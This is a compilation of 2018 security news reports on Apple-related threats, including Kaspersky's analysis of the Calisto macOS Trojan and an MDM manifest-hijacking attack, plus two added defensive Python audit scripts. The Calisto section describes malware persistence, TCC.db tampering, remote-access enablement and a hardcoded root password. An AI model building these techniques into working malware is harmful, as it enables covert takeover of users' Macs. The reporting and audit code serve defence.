The updater works the same as the Windows variant, both being implemented using the cross-platform Qt framework. At execution, it creates a unique identifier for the infected host, collects basic system information, then encrypts the data and transfers it to the attacker’s server.

The dropped executable file has an unusually large size, likely because it was inflated with junk data. The main purpose of the malware is to implant the Fallchill backdoor loader onto the compromised machine.

The Fallchill backdoor is a piece of malware formerly attributed to the Lazarus group that contains “enough functions to fully control the infected host,” Kaspersky points out. The malware operators appear to be reusing code and C&C infrastructure over and over again, the security firm also notes.

“Lazarus group has entered a new platform: macOS. […] We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once,” Kaspersky says.

What is yet unclear, however, is whether Lazarus was able to compromise Celas and abuse its update mechanism to deliver malware, or if the hackers managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism,” thus creating a fake supply chain.

'Hacky Hack Hack': Australia Teen Breaches Apple's Secure Network
17.8.2018 securityweek Apple

A schoolboy who "dreamed" of working for Apple hacked the firm's computer systems, Australian media has reported, although the tech giant said Friday no customer data was compromised.

The Children's Court of Victoria was told the teenager broke into Apple's mainframe -- a large, powerful data processing system -- from his home in the suburbs of Melbourne and downloaded 90GB of secure files, The Age reported late Thursday.

The boy, then aged 16, accessed the system multiple times over a year as he was a fan of Apple and had "dreamed of" working for the US firm, the newspaper said, citing his lawyer.

Apple said in a statement Friday that its teams "discovered the unauthorised access, contained it, and reported the incident to law enforcement".

The firm, which earlier this month became the first private-sector company to surpass US$1 trillion in market value, said it wanted "to assure our customers that at no point during this incident was their personal data compromised".

An international investigation was launched after the discovery involving the FBI and the Australian Federal Police, The Age reported.

The federal police said it could not comment on the case as it is still before the court.

The Age said police raided the boy's home last year and found hacking files and instructions saved in a folder called "hacky hack hack".

"Two Apple laptops were seized and the serial numbers matched the serial numbers of the devices which accessed the internal systems," a prosecutor was reported as saying.

A mobile phone and hard drive were also seized, and their IP address matched those detected in the breaches, he added.

The teen has pleaded guilty and the case is due to return to court for his sentencing next month.

An Australian schoolboy hacked into Apple Servers and stole 90GB of secure files
17.8.2018 securityaffairs Apple

According to Australian media, a teen hacker broke into Apple’s mainframe and downloaded 90GB of secure files. He dreams of working for the tech giant.
I believe it is time for Apple to hire the Australian 16-year-old schoolboy who hacked its computer systems. No, this is not a joke: according to Australian media, the teen hacker broke into Apple’s mainframe and downloaded 90GB of secure files.

It is embarrassing: the young hacker targeted Apple’s systems from his home in Melbourne.

The downloaded data reportedly included highly sensitive authorized keys used to grant login access to users, as well as access to multiple user accounts; Apple stated that no customer data was exposed.

When the authorities identified the young hacker, he explained that he attempted to hack Apple because he is a fan of the company and “dreamed of” working for it.

According to the Children’s Court of Victoria, the schoolboy hacked the company’s servers numerous times over more than a year; only when Apple finally discovered the intrusion did the company contact the FBI.

The FBI, with the help of the Australian Federal Police (AFP), blocked the hacker and identified him.

The Apple security team “discovered the unauthorised access, contained it, and reported the incident to law enforcement”.

[We wanted] “to assure our customers that at no point during this incident was their personal data compromised” added Apple.


The police raided the home of the schoolboy last year and found evidence of the hack, the agents found hacking files and instructions saved in a folder called “hacky hack hack”. The police also seized a mobile phone and hard drive.

“Two Apple laptops were seized, and the serial numbers matched the serial numbers of the devices which accessed the internal systems,” a prosecutor was quoted as saying by Australian media The Age. “A mobile phone and hard drive were also seized, and the IP address matched the intrusions into the organization.”

The tech giant asked the authorities not to disclose details of how the hacker breached its systems.

The teen has pleaded guilty in the Children’s Court; the judge has postponed his sentencing until next month (20 September).

Apple zero-day exposes macOS to Synthetic Mouse-Click attacks
13.8.2018 securityaffairs Apple

Patrick Wardle, the popular white hat hacker, has discovered a zero-day vulnerability that could allow attackers to carry out synthetic mouse-click attacks.
Patrick Wardle, the popular white hat hacker and chief research officer at Digita Security, has discovered a zero-day vulnerability that could allow attackers to mimic mouse-clicks for kernel access.

Wardle presented his discovery at the Def Con 2018 conference in Las Vegas. He explained that with two lines of code he found an Apple zero-day in the High Sierra operating system that could allow a local attacker to virtually “click” a security prompt and thus load a kernel extension.

Once kernel access is obtained on a Mac, the attacker can fully compromise the system.

Apple already has security measures in place to prevent attackers from mimicking mouse clicks to approve the security prompts shown to the user when a task could expose the system to risk.

Patrick Wardle has discovered a flaw that allows attackers to bypass these security measures through synthetic mouse-click attacks.

Patrick Wardle

Good morning @Defcon attendees ☀️

My talk, "🐭 > ⚔️" is today:
"The Mouse is Mightier than the Sword"
Sunday 10:00, 101 Track, Flamingo

Includes new bypasses of privacy controls & 0day breaking 'User Assisted Kext Loading' 🙈🍎🤒

See you there 🤗 https://www.defcon.org/html/defcon-26/dc-26-speakers.html#Wardle2 …

5:29 PM - Aug 12, 2018
Wardle recently demonstrated that a local, privileged attacker could leverage vulnerabilities in third-party kernel extensions to bypass Apple’s kernel code-signing requirements.

Malware developers and hackers have started using synthetic mouse-click attacks to bypass this security mechanism, emulating a human approving security warnings.

Apple mitigated the attack devised by Wardle by implementing a new security feature dubbed “User Assisted Kernel Extension Loading,” a measure that forces users to manually approve the loading of any kernel extension by clicking the “allow” button in the security settings UI.

The latest macOS versions, including High Sierra, introduced a filtering mechanism that ignores synthetic events.

“Before an attacker can load a (signed) kernel extension, the user has to click an ‘allow’ button. This recent security mechanism is designed to prevent rogue attacks from loading code into the kernel. If this mechanism is bypassed it’s game over,” Wardle explained.

Synthetic Mouse-Click attacks

Wardle discovered that it is possible to deceive macOS with two consecutive synthetic mouse “down” events, because the operating system wrongly interprets them as a manual approval.

“For some unknown reason the two synthetic mouse ‘down’ events confuse the system and the OS sees it as a legitimate click,” Wardle said. “This fully breaks a foundational security mechanism of High Sierra.”

The expert explained that the operating system interprets a sequence of two “down” events as a mouse “down” followed by an “up.” The OS also treats that “up” event as an internal event, so it is not filtered and can be abused to interact with High Sierra’s user interface and load kernel extensions.

Wardle discovered the issue by accident, after copying and pasting the code for a synthetic mouse down twice.

“I was just kind of goofing around with this feature. I copied and pasted the code for a synthetic mouse down twice accidentally – forgetting to change a value of a flag that would indicate a mouse “up” event. Without realizing my ‘mistake,’ I compiled and ran the code, and honestly was rather surprised when it generated an allowed synthetic click!”

“Two lines of code completely break this security mechanism,” he added. “It is truly mind-boggling that such a trivial attack is successful. I’m almost embarrassed to talk about the bug as it’s so simple — though I’m actually more embarrassed for Apple.”

According to Wardle, the issue only affects High Sierra, because it is the only OS version that implements Apple’s User Assisted Kernel Extension Loading.

Wardle’s presentation is available at the following URL:


Experts explained how to hack macs in enterprises through MDM
11.8.2018 securityaffairs Apple

Researchers demonstrated how a sophisticated threat actor can hack a brand new Apple Mac computer in enterprise environments through MDM.
A security duo composed of Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Bélanger, staff engineer at Dropbox, demonstrated at the Black Hat security conference how a persistent attacker could compromise brand new Mac systems in enterprise environments on first boot.

The experts leveraged Apple’s mobile device management protocol to tamper with the retrieval of the application manifest and install a different application than the one intended by the victim.

MDM allows enterprise administrators to remotely manage macOS and iOS devices: they can easily install or remove applications, lock devices, or securely erase them.

Every time a new device is added to an enterprise, it receives a Configuration Profile, an operation that can be performed automatically using the Device Enrollment Program (DEP).

macOS computers automatically contact the MDM server during the boot or after a factory reset procedure.

The DEP profile sent to the device is created by the MDM server and includes information related to software installation (e.g. the server’s URL and pinned certificates).


By using the MDM command InstallApplication, administrators can install a specified application. The command uses a manifest URL that returns an XML file containing all the information needed to install the application.

The experts explained that it is possible to manipulate this manifest through a man-in-the-middle (MitM) attack and thereby install an application of the attacker’s choosing.

The attack is not easy to conduct; nonetheless, a sophisticated nation-state actor or an ISP could carry it out.

An attacker can exploit this technique to force the installation of a malicious application as soon as the macOS computer connects to the MDM server.

The security duo reported the hacking technique to Apple in April, and in early May Apple acknowledged it. Apple addressed the issue in July with the release of macOS 10.13.6.

“We disclosed the issue to Apple shortly after discovering it. Based on our feedback, a fix was quickly implemented in the form of a new MDM command: InstallEnterpriseApplication, which is now documented publicly,” reads the research paper published by the experts.

“This command (available as of macOS 10.13.6) allows MDM vendors to provide specific certificates to pin the request to the ManifestURL (using the new ManifestURLPinningCerts property of said command). It is up to the MDM vendor to implement this, but this serves as an adequate solution to this problem. We will take a closer look at how the vulnerability was addressed.”

With the new release, Apple introduced the InstallEnterpriseApplication MDM command, which allows MDM vendors to provide certificates to pin the request to the manifest URL.

Macs in Enterprise Can Be Hacked on First Boot
10.8.2018 securityweek Apple


Researchers have demonstrated that brand new Mac computers used in enterprise environments can be hacked by sophisticated threat actors on the first boot through Apple’s mobile device management (MDM) protocol.

MDM is designed to allow system administrators to send management commands to managed macOS and iOS devices, including to install or remove applications, monitor compliance with corporate policies, and securely erase or lock a device.

When a device is enrolled in MDM, it receives a Configuration Profile, which can either be installed manually or automatically using the Device Enrollment Program (DEP). If DEP is used on macOS, the device automatically checks in with the MDM server during the initial setup process or after the system has been reset to factory settings and the operating system has been reinstalled.

The DEP profile received by a device during this process is delivered by Apple but populated by the MDM server. The profile includes information such as the MDM server’s URL, pinned certificates, and which screens should be skipped during the setup process.

One of the most popular MDM commands used during the initial setup process is InstallApplication, which allows administrators to install a specified application package. The command relies on a manifest URL that returns an XML file containing all the information needed to install the app.

Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Bélanger, staff engineer at Dropbox, showed this week at the Black Hat security conference how a threat actor could compromise the retrieval of the manifest and install a different application than the one intended by the victim.

Exploitation involves a man-in-the-middle (MitM) attack, which makes it difficult for unsophisticated cybercrime groups. However, a sophisticated state-sponsored actor or a malicious ISP may be able to carry out such an attack and infiltrate devices in a targeted organization.

According to Bélanger and Endahl, an attacker could use this method to take full control of Mac computers right after they are unboxed, as soon as they connect to the organization’s Wi-Fi network.

The researchers disclosed their findings to Apple in late April and the tech giant acknowledged their findings on May 2. The company implemented a fix on July 9 with the release of macOS 10.13.6.

Apple addressed the issue by implementing a new MDM command named InstallEnterpriseApplication. This command allows MDM vendors to provide specific certificates to pin the request to the manifest URL.

“It is up to the MDM vendor to implement this, but this serves as an adequate solution to this problem,” the researchers wrote in a paper.
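Added illustration for both MDM write-ups above (this is neither the researchers' code nor any MDM vendor's): a Python audit that parses an MDM install command and the manifest it points to, flagging InstallApplication's unpinnable ManifestURL and checking that InstallEnterpriseApplication carries ManifestURLPinningCerts. The command and manifest samples are constructed, and the certificate bytes are a placeholder.

```python
import plistlib
from urllib.parse import urlparse


def audit_install_command(command_bytes):
    """Audit one MDM command plist (the dict the MDM server returns to a device
    check-in) and list findings about how its application manifest is fetched."""
    cmd = plistlib.loads(command_bytes)["Command"]
    request = cmd.get("RequestType")
    findings = []
    if request not in ("InstallApplication", "InstallEnterpriseApplication"):
        return findings  # only app-install commands fetch a manifest
    url = cmd.get("ManifestURL")
    if url is None:
        return findings  # inline Manifest or store app: no manifest URL to protect
    if urlparse(url).scheme != "https":
        findings.append("ManifestURL is not https: the manifest is trivially replaceable on the path")
    if request == "InstallApplication":
        # InstallApplication has no way to pin the manifest request, which is the
        # gap the Black Hat talk demonstrated with a MitM on the manifest fetch.
        findings.append("InstallApplication cannot pin the ManifestURL request; "
                        "use InstallEnterpriseApplication with ManifestURLPinningCerts")
    elif not cmd.get("ManifestURLPinningCerts"):
        findings.append("InstallEnterpriseApplication without ManifestURLPinningCerts "
                        "is no stronger than InstallApplication")
    return findings


def audit_manifest(manifest_bytes):
    """Audit the manifest plist itself: every software-package asset should be
    fetched over https and carry an md5s list for the device to verify the download."""
    manifest = plistlib.loads(manifest_bytes)
    findings = []
    for item in manifest.get("items", []):
        for asset in item.get("assets", []):
            if asset.get("kind") != "software-package":
                continue
            url = asset.get("url", "")
            if urlparse(url).scheme != "https":
                findings.append(f"package {url} is not fetched over https")
            if not asset.get("md5s"):
                findings.append(f"package {url} has no md5s list to verify the download")
    return findings


# Constructed sample commands; the .invalid hostname is a placeholder.
WEAK_COMMAND = plistlib.dumps({
    "CommandUUID": "constructed-0001",
    "Command": {
        "RequestType": "InstallApplication",
        "ManifestURL": "https://mdm.example.invalid/manifests/agent.plist",
    },
})

PINNED_COMMAND = plistlib.dumps({
    "CommandUUID": "constructed-0002",
    "Command": {
        "RequestType": "InstallEnterpriseApplication",
        "ManifestURL": "https://mdm.example.invalid/manifests/agent.plist",
        # Placeholder for the DER-encoded pinning certificate(s) the vendor ships.
        "ManifestURLPinningCerts": [b"PLACEHOLDER DER CERTIFICATE BYTES"],
    },
})

# Constructed manifest with two weaknesses: plain http and no md5s list.
SAMPLE_MANIFEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>items</key>
  <array>
    <dict>
      <key>assets</key>
      <array>
        <dict>
          <key>kind</key><string>software-package</string>
          <key>url</key><string>http://pkg.example.invalid/agent.pkg</string>
        </dict>
      </array>
    </dict>
  </array>
</dict>
</plist>
"""

if __name__ == "__main__":
    for name, blob in (("weak", WEAK_COMMAND), ("pinned", PINNED_COMMAND)):
        print(name, audit_install_command(blob) or ["ok"])
    print("manifest", audit_manifest(SAMPLE_MANIFEST) or ["ok"])
```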

Snapchat Source Code Leaked
8.8.2018 securityweek Apple

iOS Update Led to Snapchat Source Code Leak

Hackers obtained some source code for the popular messaging application Snapchat and made it public on GitHub, claiming that they were ignored by the app’s developer.

The source code appears to be for the frontend of Snapchat for iOS. The company behind Snapchat, Snap Inc., has confirmed that the code is genuine by getting GitHub to remove it using a DMCA (Digital Millennium Copyright Act) request.

When users file a DMCA request with GitHub, they are instructed to provide a detailed description of the original copyrighted work that has allegedly been infringed. In this section, a Snap representative wrote, “Snapchat source code. It was leaked and a user has put it in this GitHub repo. There is no URL to point to because Snap Inc. doesn't publish it publicly.”


Snapchat told several news websites that the leak is a result of an iOS update made in May that exposed a “small amount” of its source code. The issue has been addressed and the company says the incident has not compromised its application and had no impact on the Snapchat community.

Messages posted on Twitter by the individuals who appear to be behind the source code leak suggest that they are expecting some sort of “reward” from Snapchat. It’s not uncommon for researchers who find vulnerabilities to quarrel with vendors over the impact or severity of a bug. However, Snapchat appears to be the target of an extortion attempt considering that the hackers say they will continue posting the code.

At least two individuals, allegedly based in Pakistan and France, appear to be involved in the incident. They have been posting messages written in Arabic and English on Twitter.


While Snap says the code posted online has been removed, at least two forks (i.e. copies) exist on GitHub and they suggest that the code has been online since May 24. A few hours before this article was published, the original hackers also re-uploaded the code to GitHub.

Snapchat does have an official bug bounty program powered by HackerOne and the company has been known to award significant rewards for critical vulnerabilities. Last year, two researchers earned a total of $20,000 for finding exposed Jenkins instances that allowed arbitrary code execution and provided access to sensitive data.

Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover, a version that is still current.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor: Unsigned
Intego Mac Internet Security 2018: Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if they have not used the app before.

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from the Intego’s one — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OS X El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take the then-new technology into account. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child process log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies
Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

Copies itself to the /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server
Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for antivirus software. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.
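The remote-access changes listed above are the ones a defender can verify quickly on a Mac. The following audit script is an added example, not Kaspersky's code or anything from the Trojan: it checks whether the root account has been enabled, whether Remote Login is on and whether the screen-sharing service is loaded. The command names (dscl, systemsetup, launchctl) are real macOS utilities; the interpretation of their output (the ";DisabledUser;" tag and the "No such key" message for root, the "Remote Login: On" line, the com.apple.screensharing label) is an assumption stated in the comments, and the sample outputs are constructed.

```python
import subprocess
import sys


def root_account_enabled(dscl_output: str) -> bool:
    """Parse the output of `dscl . -read /Users/root AuthenticationAuthority`.

    macOS tags a disabled account with ';DisabledUser;' inside its
    AuthenticationAuthority attribute, and prints 'No such key' when the
    attribute is absent (assumption: both are treated as 'still disabled').
    Anything else means root has been enabled, as Calisto does.
    """
    if ";DisabledUser;" in dscl_output or "No such key" in dscl_output:
        return False
    return True


def remote_login_enabled(systemsetup_output: str) -> bool:
    """Parse `systemsetup -getremotelogin`, which prints 'Remote Login: On|Off'."""
    for line in systemsetup_output.splitlines():
        if line.strip().startswith("Remote Login:"):
            return line.split(":", 1)[1].strip().lower() == "on"
    raise ValueError("unexpected systemsetup output: %r" % systemsetup_output)


def screen_sharing_enabled(launchctl_output: str) -> bool:
    """Parse `launchctl list`; a loaded screen-sharing service shows up under
    the label com.apple.screensharing (assumption: the label is stable)."""
    return any(line.split()[-1] == "com.apple.screensharing"
               for line in launchctl_output.splitlines() if line.strip())


def audit(dscl_output: str, systemsetup_output: str, launchctl_output: str) -> dict:
    """True for every setting that matches what the Trojan configures."""
    return {
        "root_enabled": root_account_enabled(dscl_output),
        "remote_login": remote_login_enabled(systemsetup_output),
        "screen_sharing": screen_sharing_enabled(launchctl_output),
    }


def _run(cmd):
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


def audit_live() -> dict:
    """Run the real commands (macOS only; systemsetup needs root)."""
    if sys.platform != "darwin":
        raise RuntimeError("live audit only works on macOS")
    return audit(_run(["dscl", ".", "-read", "/Users/root", "AuthenticationAuthority"]),
                 _run(["systemsetup", "-getremotelogin"]),
                 _run(["launchctl", "list"]))


# Constructed sample outputs: one set resembling a machine after Calisto ran,
# one resembling a default install.
SAMPLE_COMPROMISED = (
    "AuthenticationAuthority: ;ShadowHash;HASHLIST:<SALTED-SHA512-PBKDF2>\n",
    "Remote Login: On\n",
    "PID\tStatus\tLabel\n412\t0\tcom.apple.screensharing\n-\t0\tcom.apple.Spotlight\n",
)
SAMPLE_CLEAN = (
    "No such key: AuthenticationAuthority\n",
    "Remote Login: Off\n",
    "PID\tStatus\tLabel\n-\t0\tcom.apple.Spotlight\n",
)

if __name__ == "__main__":
    for name, sample in (("compromised", SAMPLE_COMPROMISED), ("clean", SAMPLE_CLEAN)):
        print(name, audit(*sample))
```

Each parser is kept separate from the command that feeds it so the logic can be checked offline; audit_live() wires the three real commands in when run on a Mac.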

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain
Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d

Calisto macOS Backdoor Remained Undetected for Two Years
23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto's characteristics, Kaspersky says, bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguised as a Symantec product), its code contains the line “com.proton.calisto.plist,” and it can steal a lot of personal data from the system, including the contents of Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.

Experts discovered Calisto macOS Trojan, the first member of Proton RAT family
22.7.2018 securityaffairs  Apple

Security experts from Kaspersky Lab have discovered a precursor of the infamous Proton macOS malware that was named Calisto.
Malware researchers from Kaspersky Lab have discovered a malware sample, tracked as Calisto, that appears to be the precursor of the Proton macOS malware.

“We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.” reads the analysis published by Kaspersky.

“Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:”

The malicious code seems to have been developed in 2016, while Proton was first spotted in 2017.

According to the experts, the malware was uploaded to VirusTotal in 2016 but nobody noticed it until May 2018. Kaspersky has no information about the way the threat was propagated, but the researchers immediately noticed that some features implemented by Calisto were still under development.

The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac.

The analysis published by Kaspersky revealed that many features implemented in Proton malware were not present in Calisto.

Proton malware was first discovered in March 2017, when threat actors were offering it for sale on an underground hacking forum at prices ranging from $1,200 to $830,000 for the entire project.

A few weeks later the malware was involved in attacks in the wild for the first time: threat actors hacked the website of the HandBrake app and poisoned the official app with it.

In October 2017 attackers distributed the Proton RAT by poisoning legitimate applications, such as the popular Elmedia Player and the download manager Folx, from the developer of Elmedia Player.

Both Proton and Calisto are remote access Trojans (RATs) that, once they infect a system, give the attackers full control over it.

Calisto allows remote control of infected Macs; some of the features it implements are listed below:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
Static analysis conducted by the experts revealed unfinished functionality, including:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS
Experts pointed out that Calisto was developed before Apple rolled out the SIP (System Integrity Protection) security mechanism; for this reason it is not able to bypass it.

“Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions.” researchers explained. “Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.”

This implies that Calisto cannot infect modern macOS versions. In any case, below are a few recommendations to protect against Calisto, Proton, and similar threats:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
Currently Calisto appears to have been abandoned by its authors.

Attackers Target iPhones Using Open Source MDM Solution
18.7.2018 securityweek  Apple

Recently discovered cyber attacks targeting iPhone users have been using an open source mobile device management (MDM) system to control enrolled devices, Talos reports.

Enrollment of targeted devices could be performed via physical access or social engineering, but Talos could not determine which method the attackers used. As part of a highly targeted campaign, the attackers went to great lengths in their attempt to replace specific apps and intercept user data.

With the use of the MDM solution, the actor deployed five applications to the 13 targeted devices in India. As a result, they were able to steal SMS messages, view the device location, and exfiltrate data. Apple has been informed of the attack and has already acted against the certificates the attackers used.

Talos security researchers discovered that the attackers added features to legitimate apps (including WhatsApp and Telegram) using the BOptions sideloading technique. Then, the MDM was used to deploy the apps onto targeted devices.

The injected malicious code could gather and steal information such as phone number, serial number, location, contacts, user's photos, SMS and Telegram and WhatsApp chat messages.

The malware appears to have been in use since August 2015, logs on the MDM server and the command and control (C&C) server reveal. Based on other information found on these servers, Talos believes that the malware author works out of India.

The two MDM servers used by the attackers are based on the small, open-source project mdm-server. Through MDM, admins can control multiple devices from a single location, can install and remove apps and certificates, lock the device, change password requirements, and more.

The enrollment process, however, requires user interaction at each step, which suggests that social engineering was used as part of the attack. Most likely, users were advised to install the attacker’s certificate to allow enrollment, and the use of a domain such as "ios-certificate-update[.]com" helped them trick users.

The attacker used a certificate issued in September 2017 for an email address located in Russia, which is believed to be a false flag, as the attacker isn’t located in Russia. The certificates are either self-signed or signed by the Comodo certificate authority.

According to Talos, the affected devices, all located in India, include the following models: iPhone 5.4, iPhone 7.2, iPhone 8.1, iPhone 8.2, iPhone 9.3, and iPhone 9.4. The operating system versions include 10.2.1, 10.3.1, 10.3.2, 10.3.3, 11.0, 11.0.3, 11.2.1, 11.2.5, and 11.2.6.

While there’s no information available on how the 13 devices were enrolled in the MDM, the attacker likely tested the solution on their own iPhone, the researchers say.

The attack, however, appears focused on deploying malicious apps onto the compromised devices to steal information. The attacker injected code into applications such as AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp and then loaded them onto the targeted iPhones.

The malicious Telegram and WhatsApp versions were observed sending the collected information to a server that has been active since August 2015.

“At the time, it is unclear who the targets of the campaign were, who was the perpetrator, or what the exact purpose was. It's very likely the vector for this campaign was simply social engineering - in other words asking the user to click "ok". This type of vector is very difficult to defend against since users can often be tricked into acting against their best interests,” Talos concludes.

Apple Patches KRACK Flaws in Boot Camp
12.7.2018 securityweek  Apple

Apple has released an update for its Boot Camp utility to address vulnerabilities related to the wireless Key Reinstallation Attacks (KRACK) that were disclosed late last year.

A total of 10 KRACK vulnerabilities were disclosed in October 2017, all impacting the Wi-Fi standard itself and rendering all Wi-Fi Protected Access II (WPA2) protocol implementations vulnerable. The new type of attack also impacts industrial networking devices.

An attacker looking to exploit the vulnerabilities would need to manipulate and replay handshake messages to trick the victim into reinstalling an already-in-use key. An attacker within Wi-Fi range of a victim would then have access to information previously assumed to be safely encrypted.

Vendors raced to patch the flaws, and Apple itself released a first set of KRACK-related patches in October last year, for iOS, macOS, tvOS, and watchOS devices. The company also addressed the bugs in Apple Watch and AirPort Base Station Firmware.

Apple is now pushing a fix for Boot Camp, the multi-boot utility included in macOS that allows users to install Microsoft Windows operating systems on Intel-based Macs.

